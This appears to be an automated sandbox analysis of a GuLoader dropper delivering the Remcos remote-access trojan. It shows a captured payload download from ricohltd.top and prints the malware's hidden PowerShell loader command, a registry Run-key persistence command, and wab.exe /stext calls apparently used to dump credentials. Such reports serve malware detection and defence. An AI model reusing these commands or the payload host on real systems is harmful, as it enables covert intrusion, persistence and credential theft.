75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                            Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449737104.21.60.384437812C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-19 17:12:09 UTC177OUTGET /PIoDroeALMbPB243.bin HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                            Host: ricohltd.top
                                                                                            Cache-Control: no-cache
                                                                                            2024-04-19 17:12:09 UTC849INHTTP/1.1 200 OK
                                                                                            Date: Fri, 19 Apr 2024 17:12:09 GMT
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 494656
                                                                                            Connection: close
                                                                                            Last-Modified: Wed, 17 Apr 2024 09:41:32 GMT
                                                                                            ETag: "661f994c-78c40"
                                                                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                            Cache-Control: max-age=315360000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 77445
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWQ%2F8IEGKBh2SEWerGu%2FUQOYwUmRr%2B6YdOzIanpJFqg%2BqQXHwBekXQkUlYc%2BlhpMDBg5fwtLiG1chOcAqRbJxc%2BPm%2FjopivVGOA4lQm9w%2FceKgckouABgIkmiXG5CIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 876e84926e8f53b7-ATL
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            2024-04-19 17:12:09 UTC520INData Raw: 10 a2 6f df 8f 9f 3f 7f 57 12 0b 45 2a 66 83 11 48 fd 5f fc 6d ba f0 98 e9 20 e3 8f 6d 1f 38 dc 69 d3 d9 02 e9 c3 ee 5e 80 9c 4f ed f7 cc 87 fd 8c 09 1f c0 c3 90 cf a0 3d a6 e3 fe c4 1d f4 9e eb 24 00 70 02 00 70 48 1a d2 61 c6 ad 90 b6 cb ad 89 c7 04 79 65 e1 81 17 f9 62 98 a2 37 b9 a0 11 07 df ca c1 0a 29 23 05 62 d6 2e 49 db ae 39 d9 c9 34 7c 47 39 e1 c7 0d ae 12 3c de 41 0c 36 a3 a2 7a 5f e9 bd 3c 60 d8 b1 b5 96 c0 9e 44 00 56 b8 14 de 22 35 a5 08 5e 4a dc ab 4d b9 ee be f7 e5 69 62 22 ad a6 fa 36 a1 ef 92 ca 09 c4 f0 d0 81 53 fa a9 3c a3 53 0e 22 af e5 32 6c 40 6a b2 7c 9a 3a d6 54 b8 6f 63 36 c1 1e 52 7b c7 ed ca 77 55 bd cf a9 60 aa 8f 0e b9 63 48 92 47 0e 71 b8 9d 53 6b 19 89 f7 ec ff 1e c8 c1 bb 58 ef f9 b9 79 27 bb 66 b2 8f 6e 60 58 9b 0d f1 54
                                                                                            Data Ascii: o?WE*fH_m m8i^O=$ppHayeb7)#b.I94|G9<A6z_<`DV"5^JMib"6S<S"2l@j|:Toc6R{wU`cHGqSkXy'fn`XT
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 42 f8 c5 2f 7d af 31 7d 1c 24 42 01 a0 75 f0 b6 97 6f 68 8d 59 69 17 35 a1 03 7c 27 6c bb f4 5f 41 92 12 90 6d f5 9c b7 6a 34 b3 3a f7 f4 14 0d 71 c5 79 22 f4 99 32 6a 8e 64 ec 89 a6 50 c7 5d 47 b9 06 55 00 ac 9b 93 b6 e7 a8 37 10 87 e7 fa cc 2c 9f 9f a6 c3 28 3a fd 44 a0 a6 bc ec cb b1 98 0a 8a 10 cd 5f 9f 0f 99 a4 eb 03 da 60 68 d1 36 b7 06 fd 32 e2 4c db 71 3c 09 9e 86 b7 5f 56 34 f7 ed 43 5e a4 37 ef 2a af 69 8e 6a 00 78 da ee d7 0a e3 bd cb 1d 0b 7d 47 5b f0 dd 68 d9 77 1a 7c 0a a4 8c 70 64 89 b4 75 30 21 b4 6c db 4a 41 ad 60 57 1d b6 07 43 fd bc 4c d6 a1 02 89 8f d5 17 3c 8a 79 01 e2 2e 98 f2 d9 75 dc c6 04 10 79 20 b8 0b 61 8b 13 3a 75 dc f3 ea 71 92 39 74 19 b1 94 42 a1 27 df f2 0b 86 72 9a 6b 52 fa ef 89 ca 51 4c cd a1 7d 79 05 a8 c6 f7 d6 6c 2a
                                                                                            Data Ascii: B/}1}$BuohYi5|'l_Amj4:qy"2jdP]GU7,(:D_`h62Lq<_V4C^7*ijx}G[hw|pdu0!lJA`WCL<y.uy a:uq9tB'rkRQL}yl*
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: a3 bb 29 0e 5b 18 86 94 df 77 72 e5 8a e1 8c 98 5f bd b7 75 69 e2 4d 8c 8f cd 6f 31 92 29 1d b6 6f e0 74 f9 4c 3e 84 46 8d 8f 8c d6 85 f2 2c b8 e4 c6 10 ff d9 75 b4 6b 84 55 79 c8 b7 3f 22 8b 4a 39 31 bb 2c 7b 41 a6 39 9c a1 80 94 42 c9 10 58 b7 0b 6a 85 a9 68 52 a4 2c e3 ca e8 d4 98 e6 7d 91 75 9b c6 f7 fe ad aa 81 cc ce d4 47 65 32 e2 95 a1 91 33 56 37 d1 d0 dd 95 5b 15 5b 73 ec 35 c6 93 0e 71 18 5b 22 5b a4 be 08 f0 24 f1 cd ee 03 df 26 e8 ec 58 ab 2c e2 fd 67 e0 77 46 ae 2c cf f5 c8 f2 d4 3e 43 19 4e f9 ca ba 09 e1 14 4b 93 25 4e ec e7 48 f5 75 fc 79 34 26 35 ce 21 43 c0 d8 25 75 5f 6f a5 07 40 fd c2 16 0d bb 79 c9 1f fc b0 e6 d8 01 8b 86 ea 8a 1b fb dc 90 47 e4 65 f2 af 39 be 56 45 39 bd 10 e0 35 4b ed df 01 94 a9 89 fc d9 c4 96 e2 51 f6 61 53 66 76
                                                                                            Data Ascii: )[wr_uiMo1)otL>F,ukUy?"J91,{A9BXjhR,}uGe23V7[[s5q["[$&X,gwF,>CNK%NHuy4&5!C%u_o@yGe9VE95KQaSfv
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 6b ab a7 82 89 37 ce 30 ae 51 49 ff 2e c6 8e ee 55 bd 49 2d 3f ce 52 2c d2 6a 64 45 2a a5 ee e7 f6 89 00 d4 7a 6d 66 b1 fe 1c 43 c0 cf 3e 73 44 3c 46 21 28 fd ec fe 73 e0 4a b6 03 3f e1 ca a1 45 8b 37 90 11 fe d1 b7 63 9e 2c 29 3e d7 e2 af 5e 1c fa 5e 65 24 5e f5 86 9f c9 dd 2d 0c e8 a9 56 9b 61 e9 08 7b 6a 82 32 f1 85 e5 41 ee 7d 6d 22 91 3c a5 e1 6f 4d 55 a1 5b fb 93 bd e3 54 d0 14 90 e1 bf 63 b2 04 38 59 d6 ca bc 49 8c 94 3b 1c 15 fb b3 e0 c7 43 72 c8 c5 61 c2 d0 61 f7 2d 98 ba fa 6f 5d 69 1c 73 80 5c 92 e3 4f dc 1b 0e 6c c4 19 57 8d 19 32 d0 1e 21 40 ac a3 e4 d5 96 d5 bc 8f 51 a2 b1 64 42 8f 49 55 ad 8c fc ed af 9a 3e 5d 0d fc a5 63 e3 42 2e 4d be 81 40 16 fd 3a a2 1f 78 21 6a 66 76 58 a2 61 40 b9 8f 6d c0 f3 ea 95 cf e9 03 19 bd de 04 6f d3 62 b7 28
                                                                                            Data Ascii: k70QI.UI-?R,jdE*zmfC>sD<F!(sJ?E7c,)>^^e$^-Va{j2A}m"<oMU[Tc8YI;Craa-o]is\OlW2!@QdBIU>]cB.M@:x!jfvXa@mob(
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 04 9a 75 48 45 16 5d 2d d3 53 1a 6c 04 1a 49 0c c3 50 90 b4 db b4 25 ce cd 2e 6c c4 19 51 c9 b6 34 38 6a dd 57 2d ce c4 83 39 b6 c6 3d 5b e5 4e fc 8a 3f b4 55 14 f0 59 4f ba 72 a7 05 86 2c 42 cf 64 56 04 0a be c8 c2 29 ba 3a ad 6b 9d 6c cc 05 f6 fb 2e 4b ef 1f a9 ad 63 3a 4b 02 42 06 b3 57 12 f5 b2 f7 f9 7c 3c 5b 23 73 94 d2 d7 75 79 4f 62 78 4c 8c b8 b7 25 c9 ef 81 8b d1 b8 3c ee b0 e4 21 0b fd 27 eb f2 31 d5 f2 6a e6 47 b9 e5 77 02 a5 62 dd e8 1a a3 2b 4e 7a 25 12 29 49 bb 97 91 75 e3 2b 7e 2b 80 fc f0 ec 0c e8 fa 48 3c 7a 82 e9 48 5d 74 f1 e5 98 87 9d cd f6 8e e1 85 27 fd a5 b9 93 31 df 1b 7b 65 10 9f 04 a6 6d 0c d9 33 91 b5 1a d3 24 72 43 41 d6 08 87 65 c8 a7 11 7d 81 5d cd ce 62 ae 7b b8 1f 24 2c 4e b2 be ac 56 44 41 11 82 f4 51 59 1b 59 b8 4c 20 3a
                                                                                            Data Ascii: uHE]-SlIP%.lQ48jW-9=[N?UYOr,BdV):kl.Kc:KBW|<[#suyObxL%<!'1jGwb+Nz%)Iu+~+H<zH]t'1{em3$rCAe}]b{$,NVDAQYYL :
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 97 a0 a0 0a d5 79 68 e3 76 79 b2 d6 a8 7a 48 c8 0d 94 77 42 ad db 5e bd 44 b7 bb cb 05 c3 7a 3b 8e e5 90 38 57 f4 13 70 1e c2 6b 88 a1 e8 f0 72 6c fb 86 cb bc 99 d8 e4 e0 21 9a 94 23 a2 f2 0f 18 65 20 c0 12 04 3d a5 d6 68 ec 82 fa 16 49 67 2a 9d 6f 7b b3 50 1d f6 db b6 a1 56 cf 10 a9 60 2e b9 d8 bc 2d 89 2f 81 d0 8e 70 f4 5f dc 8a 59 b9 16 57 98 c1 33 b5 a2 50 d5 cc 97 ab 21 f8 07 60 be 04 1b 10 df 91 51 eb 83 c7 b3 22 68 90 ee 5c e8 9e 8a 82 d6 ea 7e 5c 5a f2 91 a5 d8 8c 09 f6 f4 30 da 5a 94 70 57 8b 81 3c 4c 81 89 6b 51 6f b6 40 cd 0a fc 14 0b 21 b4 0a 99 11 3b 65 5d c8 3a dc 35 13 df 41 29 81 6c 23 8c 26 f2 3e 3f ce 51 4d fd dd 64 94 cb 35 e1 c7 54 fe 47 d4 d5 b2 f3 c9 2e 79 cc da ea 82 fb ed a9 f6 c0 fe 19 57 e2 95 c0 34 bf 66 b8 25 c1 7a 3f 7a a7 43
                                                                                            Data Ascii: yhvyzHwB^Dz;8Wpkrl!#e =hIg*o{PV`.-/p_YW3P!`Q"h\~\Z0ZpW<LkQo@!;e]:5A)l#&>?QMd5TG.yW4f%z?zC
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: c0 f1 a2 f3 86 3f 13 28 2e 34 0d 7f b0 9d 3a b4 78 73 04 2e 8a 1a d2 ea 08 ba 6f b2 cb 15 45 af 48 27 23 e1 69 8a d0 61 98 6e b4 c5 84 15 07 8c 41 18 7e 00 cb 8d 9b 29 d1 70 9f 8a 31 ab d7 62 f7 8c d1 9b 3e f2 51 99 f7 5d b0 e4 5e 54 42 3f 52 d9 32 41 89 f5 57 c2 de bd be fb 6a 0d 0b 6f 6c 54 5a 94 2d b4 de 14 34 28 d7 80 5a f7 e1 07 8c cd e4 15 e6 4e 20 0a 4c 71 b9 ae e0 ce fd bc 50 6f 03 57 a6 d5 a9 60 1a 02 3a a8 f3 d5 e7 21 fc c4 2e 11 35 53 cc 60 7f f1 7f 02 e0 44 9a be 2b ef aa 4a 2b 90 a7 14 1d f4 98 9d 32 23 8e d0 2c bd 70 a6 76 3a 96 43 33 16 34 87 c7 cc 2c 83 49 99 9c 67 74 15 9b 81 71 f7 55 43 57 0a 17 54 f4 f0 ba e0 aa b9 dd d9 3e a6 6c 42 e9 5f 6b 4d 03 24 a6 fc f4 9e 24 23 58 0a 44 6c 47 da 14 26 eb 8e 4c ed 95 45 a0 4c 6c 69 ed 68 a3 d3 f4
                                                                                            Data Ascii: ?(.4:xs.oEH'#ianA~)p1b>Q]^TB?R2AWjolTZ-4(ZN LqPoW`:!.5S`D+J+2#,pv:C34,IgtqUCWT>lB_kM$$#XDlG&LELlih
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 24 ff 95 8d 7e 78 93 34 11 99 f9 9f 50 b5 18 4a 97 ab 39 27 75 66 8f 1a 55 72 c5 18 e3 5c 89 f6 af 0d 8d 22 cc c5 6e 48 a5 a1 d2 58 c5 a4 9b e1 3b fa c0 3b f4 f5 7b 06 17 81 e3 f0 ba af 3b 3e f3 80 68 24 dd 45 62 84 ec c7 7f 8d e7 eb 21 fd 13 1a 9e 31 48 27 3f ca 15 24 15 71 b3 bf bb 0b 48 9d 80 cf d0 35 fa 64 58 03 66 77 2e a0 ad 0d 60 62 35 33 5c 6a c2 33 c0 46 ca 67 aa 20 15 5d d6 e3 30 83 1f 08 52 96 67 4f 4c ee a1 0e 6e 3d a2 b4 df d4 1f 20 eb bc 37 5d 5c 7e 27 08 77 96 8c d0 f4 68 03 d0 d4 61 71 60 b0 c8 25 c7 cd 61 6a f3 61 f3 f4 6a e3 0a e6 38 7a c3 71 ce 45 25 c6 a4 99 50 87 ea e7 c6 81 ef 35 e1 29 47 3f 03 59 ac aa d0 1f 6e 58 d2 fd 39 eb ee 20 97 e6 21 65 63 59 7b 5c 89 82 01 77 29 23 0b d6 1f ed 91 5f 6b 13 72 b7 d5 fd 68 a1 f9 88 b1 e6 b2 34
                                                                                            Data Ascii: $~x4PJ9'ufUr\"nHX;;{;>h$Eb!1H'?$qH5dXfw.`b53\j3Fg ]0RgOLn= 7]\~'whaq`%ajaj8zqE%P5)G?YnX9 !ecY{\w)#_krh4
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: 64 0e 4f 91 31 96 c7 ef d8 e4 4a e8 73 64 57 38 cf 91 e4 9e 1f 31 4c c3 cd e0 8d 0c 9e 20 bb a8 c9 d6 e5 80 85 b7 48 ef 0d 43 53 99 4a 03 b8 43 06 1c f5 72 46 7a b3 47 74 f2 a6 53 e3 13 94 77 85 fd f7 39 9f 21 78 b7 79 03 ae e0 99 07 2a be 79 fe c7 ee de 6f 79 d4 2e e5 7b 6c 2e fd 78 b7 e3 7f fc f3 9e c8 68 79 1f 13 c7 ae 3e a5 f0 7e 00 c7 aa 18 03 5c 70 cf 51 39 04 31 66 2d 24 f8 ea d2 57 a0 55 4f 0e 3a f4 09 63 d4 c7 74 24 b3 10 c1 82 18 74 49 9c 8c 7d 34 29 88 4b 9a ea b2 e7 5a 63 4b 92 0d 0d de 91 96 2b 2a dd 65 af 31 2e ef ab 60 11 b5 26 18 23 63 90 97 72 2d 4d 0f be 6f c0 91 e3 65 40 0b d4 8f 19 ca 78 58 1b 63 48 e1 58 97 1a 7c 39 9d 49 55 dd 8e f3 7f 99 b9 ba 8b c3 b2 3b dd d6 7b 5d 32 c8 28 11 24 a8 b0 50 3f d1 89 17 2b 68 94 d1 9c a7 51 77 54 2e
                                                                                            Data Ascii: dO1JsdW81L HCSJCrFzGtSw9!xy*yoy.{l.xhy>~\pQ91f-$WUO:ct$tI}4)KZcK+*e1.`&#cr-Moe@xXcHX|9IU;{]2($P?+hQwT.
                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: b7 74 f6 af 75 5b 26 49 ea b2 b9 2c 9c 6a 3d df 0d 1a 64 69 d4 47 ef 11 c3 ba 39 40 eb cf cf 1f 45 18 26 7e 90 97 dd d2 a7 ff bd 48 6c 86 24 57 ef 1c 3f 9c 6d ed 13 a9 f9 cb 8c 1e 10 af 4f d6 7f da e5 1e 2c 86 dd 79 95 09 ef 7b 1f cc 28 59 9e c4 9e 62 20 5e bc ff 43 cb 7b 81 48 52 c8 fb 9a 6c b6 e8 30 77 d3 4f 3c d7 39 3e cf 6e f6 74 ae 22 2e 49 28 06 79 64 c1 60 8c eb d1 61 cd 8f 18 29 21 c9 32 5a a2 b9 52 17 80 b3 2c 09 15 48 5f 20 b9 cb 08 21 c8 1f 67 62 24 e8 48 75 f6 0a 75 61 57 ef 9a 5a 0b 52 33 e5 f4 f6 04 53 7d d9 d0 8f 9f b2 a0 f5 5b d5 29 8f 93 4b 00 20 de 81 60 33 5e 87 26 f3 af 50 be 8a 47 bc ec a4 ae 7d 8d 71 0c 11 19 61 48 75 ff b5 7f cb 79 85 51 cc 93 52 47 2a ab 41 e3 2c 64 ec 05 d0 cf b1 ab 9e ad 1d 50 7f 5b 6b ac 5e 58 27 86 2f a2 f9 55
                                                                                            Data Ascii: tu[&I,j=diG9@E&~Hl$W?mO,y{(Yb ^C{HRl0wO<9>nt".I(yd`a)!2ZR,H_ !gb$HuuaWZR3S}[)K `3^&PG}qaHuyQRG*A,dP[k^X'/U


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:19:10:57
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:533'858 bytes
                                                                                            MD5 hash:0E1262A4CE5AC71AD5B8DF93030D61B5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:19:10:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
                                                                                            Imagebase:0x1e0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:19:10:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:19:11:00
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:19:11:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
                                                                                            Imagebase:0x900000
                                                                                            File size:59'392 bytes
                                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:23.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21.2%
                                                                                              Total number of Nodes:1309
                                                                                              Total number of Limit Nodes:35
                                                                                              execution_graph 3655 402840 3656 402bbf 18 API calls 3655->3656 3658 40284e 3656->3658 3657 402864 3660 405c00 2 API calls 3657->3660 3658->3657 3659 402bbf 18 API calls 3658->3659 3659->3657 3661 40286a 3660->3661 3683 405c25 GetFileAttributesW CreateFileW 3661->3683 3663 402877 3664 402883 GlobalAlloc 3663->3664 3665 40291a 3663->3665 3668 402911 CloseHandle 3664->3668 3669 40289c 3664->3669 3666 402922 DeleteFileW 3665->3666 3667 402935 3665->3667 3666->3667 3668->3665 3684 403258 SetFilePointer 3669->3684 3671 4028a2 3672 403242 ReadFile 3671->3672 3673 4028ab GlobalAlloc 3672->3673 3674 4028bb 3673->3674 3675 4028ef 3673->3675 3676 403027 32 API calls 3674->3676 3677 405cd7 WriteFile 3675->3677 3681 4028c8 3676->3681 3678 4028fb GlobalFree 3677->3678 3679 403027 32 API calls 3678->3679 3682 40290e 3679->3682 3680 4028e6 GlobalFree 3680->3675 3681->3680 3682->3668 3683->3663 3684->3671 3685 401cc0 3686 402ba2 18 API calls 3685->3686 3687 401cc7 3686->3687 3688 402ba2 18 API calls 3687->3688 3689 401ccf GetDlgItem 3688->3689 3690 402531 3689->3690 3691 4029c0 3692 402ba2 18 API calls 3691->3692 3693 4029c6 3692->3693 3694 4029d4 3693->3694 3695 4029f9 3693->3695 3697 40281e 3693->3697 3694->3697 3699 405f97 wsprintfW 3694->3699 3696 406072 18 API calls 3695->3696 3695->3697 3696->3697 3699->3697 3299 401fc3 3300 401fd5 3299->3300 3301 402087 3299->3301 3319 402bbf 3300->3319 3303 401423 